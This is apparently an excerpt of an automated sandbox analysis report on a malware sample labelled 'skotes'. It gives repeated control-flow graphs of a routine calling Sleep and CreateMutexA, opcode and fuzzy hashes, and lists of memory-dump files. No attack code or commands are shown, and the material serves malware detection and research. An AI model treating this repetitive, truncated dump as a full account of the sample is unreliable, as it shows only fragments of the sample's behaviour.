                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 4676859355dc2d338923141a47d7925d8c8e1875cfa675b8aece01845e8f6192
                                                                                                                                            • Instruction ID: b2e168bb809fc250912c1f659f5852a9ed0a77f309527fcee06cbf6eecd5c7fb
                                                                                                                                            • Opcode Fuzzy Hash: 4676859355dc2d338923141a47d7925d8c8e1875cfa675b8aece01845e8f6192
                                                                                                                                            • Instruction Fuzzy Hash: 7E314A31B101088BEB08DB78DD89F7CB761EB95318F24C25CE418A73D6CB3999818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 202 aca682-aca6a2 206 aca6a4-aca6b0 202->206 207 aca6d0-aca6ec 202->207 208 aca6c6-aca6cd call add663 206->208 209 aca6b2-aca6c0 206->209 210 aca6ee-aca6fa 207->210 211 aca71a-aca739 207->211 208->207 209->208 214 aca949-aca994 call af6c6a * 2 Sleep CreateMutexA 209->214 216 aca6fc-aca70a 210->216 217 aca710-aca717 call add663 210->217 212 aca73b-aca747 211->212 213 aca767-aca916 call ad80c0 211->213 218 aca75d-aca764 call add663 212->218 219 aca749-aca757 212->219 234 aca996-aca998 214->234 235 aca9a7-aca9a8 214->235 216->214 216->217 217->211 218->213 219->214 219->218 234->235 236 aca99a-aca9a5 234->236 236->235
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 3e1f40273f94384a40deb622dc8d2a72fa83ba499d3944aab5f64a5b34d50a45
                                                                                                                                            • Instruction ID: 0444d9383bf4a385f3a3f48138612d2c97c77d310efc2c79a7da6ac99a5bd8fc
                                                                                                                                            • Opcode Fuzzy Hash: 3e1f40273f94384a40deb622dc8d2a72fa83ba499d3944aab5f64a5b34d50a45
                                                                                                                                            • Instruction Fuzzy Hash: CD314A31B101088BEB18DB78DD89FBDB7B2EB91318F24825CE118E73D6D73999808752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 238 ac9adc-ac9ae8 239 ac9afe-ac9d91 call add663 call ad7a00 call ac5c10 call ac8b30 call ad8220 call ad7a00 call ac5c10 call ac8b30 call ad8220 238->239 240 ac9aea-ac9af8 238->240 240->239 241 aca917 240->241 243 aca953-aca994 Sleep CreateMutexA 241->243 244 aca917 call af6c6a 241->244 250 aca996-aca998 243->250 251 aca9a7-aca9a8 243->251 244->243 250->251 253 aca99a-aca9a5 250->253 253->251
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 3afe980ae515ca37694192e1d4112692ee6911047a401d64828d4943d702da5e
                                                                                                                                            • Instruction ID: 1e3a49c5ba41b53757f0210559f5ebfd23d76a489e792de8775dfdae7ca5e813
                                                                                                                                            • Opcode Fuzzy Hash: 3afe980ae515ca37694192e1d4112692ee6911047a401d64828d4943d702da5e
                                                                                                                                            • Instruction Fuzzy Hash: 282197317002009BEB18AB6CEC89B7DB3A2EBD0304F20825DE518D72E1DB759D808601

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 306 aca856-aca86e 307 aca89c-aca89e 306->307 308 aca870-aca87c 306->308 311 aca8a9-aca8b1 call ac7d30 307->311 312 aca8a0-aca8a7 307->312 309 aca87e-aca88c 308->309 310 aca892-aca899 call add663 308->310 309->310 313 aca94e-aca987 call af6c6a Sleep CreateMutexA 309->313 310->307 323 aca8e4-aca8e6 311->323 324 aca8b3-aca8bb call ac7d30 311->324 315 aca8eb-aca916 call ad80c0 312->315 326 aca98e-aca994 313->326 323->315 324->323 328 aca8bd-aca8c5 call ac7d30 324->328 329 aca996-aca998 326->329 330 aca9a7-aca9a8 326->330 328->323 335 aca8c7-aca8cf call ac7d30 328->335 329->330 332 aca99a-aca9a5 329->332 332->330 335->323 338 aca8d1-aca8d9 call ac7d30 335->338 338->323 341 aca8db-aca8e2 338->341 341->315
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 512dc58153d3d5531c287ae87e30f88fae7f551da95b85ebca74df743d577fac
                                                                                                                                            • Instruction ID: 7de35f48334ceb12447eb728d1ec4f64830a59a172f3952e0de2ad39e1de3b4a
                                                                                                                                            • Opcode Fuzzy Hash: 512dc58153d3d5531c287ae87e30f88fae7f551da95b85ebca74df743d577fac
                                                                                                                                            • Instruction Fuzzy Hash: 22216D313452058BF728676C9D96F7DB3A19FA1708F21445EE509D62D2CF7A48818753

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 283 aca34f-aca35b 284 aca35d-aca36b 283->284 285 aca371-aca39a call add663 283->285 284->285 286 aca93a 284->286 291 aca39c-aca3a8 285->291 292 aca3c8-aca916 call ad80c0 285->292 288 aca953-aca994 Sleep CreateMutexA 286->288 289 aca93a call af6c6a 286->289 299 aca996-aca998 288->299 300 aca9a7-aca9a8 288->300 289->288 293 aca3be-aca3c5 call add663 291->293 294 aca3aa-aca3b8 291->294 293->292 294->286 294->293 299->300 303 aca99a-aca9a5 299->303 303->300
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
